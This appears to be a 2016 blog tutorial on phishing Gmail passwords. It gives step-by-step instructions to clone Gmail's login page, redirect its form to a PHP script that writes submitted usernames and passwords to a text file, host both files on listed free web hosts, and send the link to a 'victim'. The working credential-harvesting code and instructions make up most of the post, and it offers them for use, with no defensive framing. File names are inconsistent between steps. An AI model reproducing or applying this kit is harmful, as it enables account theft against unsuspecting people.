Pages (Topics)

Wednesday, February 10, 2016

How to hack Gmail with Phising:



                                                                                             By: Usama Mughal

1- First open your Gmail.com

2-  Then right click on the page, you will see the option view source page,simply click on that.(see bellow picture for better understanding )



                                      



                                         
3- now a pop up window  will be open which contain a source code of Gmail  page, And Copy  all the code using ctrl+c 

              


4-
 Now open the notepad and past all code here which copy in step 3

                               
                                   

 5-  Now press CTRL+F,and type ACTION.




6-
 You will have to search action again and again till you get like bellow code
                                      
action="https://www.google.com/accounts/SeviceLoginAuth"

 

hacking%2Bwith%2Bphishing

Step-7
 After that delete all the text written in blue color and instead of it write hack.php.then it will look like.( see bellow given picture)
                                                 action="hack.php"

 



8- Now save it on your desktop with the name index.htm,not index.html,remember.

9- Now your phishing page is ready.

 
 Now you need to create a php file for this Open a new notepad and copy the bellow code and save it with the name hack.php.

<?php
header ('Location:http://www.google.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

Note: I use hack.php in step 7 that's why we need to use same name in step 9

10-
 You have successfully created two files 


  •  index.htm 
  • hack .php,

11- 
now you need to upload these two files in a free web hosting site i am giving you the list of  best webhosting site which are useful for you . you need to make a account on any of one below webhosting site.(I think the list is perfect for you)


www.my3gb.com
www.000webhost.com
www.freewebhosting.com
www.xhosting.com
http://110mb.com
http://ripway.com
http://superfreehost.info
http://freehostia.com
http://freeweb7.com
http://t35.com
http://awardspace.com
http://phpnet.us
http://prohosts.org
http://www.freezoka.com/
http://atspace.com

 
 Note: I prefer 000webhost.com because it is easy to use if it not work for you try another webhosting service which are mention above ,so here i am going to use 000webhost.com in further steps 

12- 
You have to make a account in that ,after that it looks like a picture given below.



facebook script hosting websiteNow go control pannel,then on file manager.

13- After that a new window will pop up.Now go to public_html.


                                           
                                        

14- Delete the file named default.php,after that upload two files index.htm and post.php one by        one .



                                        
15- Now the last step click on view of index.htm it will look same as Gmail page.



                                         

16- Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to Gmail. and you will be now able to see his password.

17- Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                


                                        

18- Click on view now u will have your friend's password and email id.


                                           

19- This is a simple trick to hack any Gmail password account by phishing page.

20- If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.









Video Tutorial coming soon..........

No comments:

Post a Comment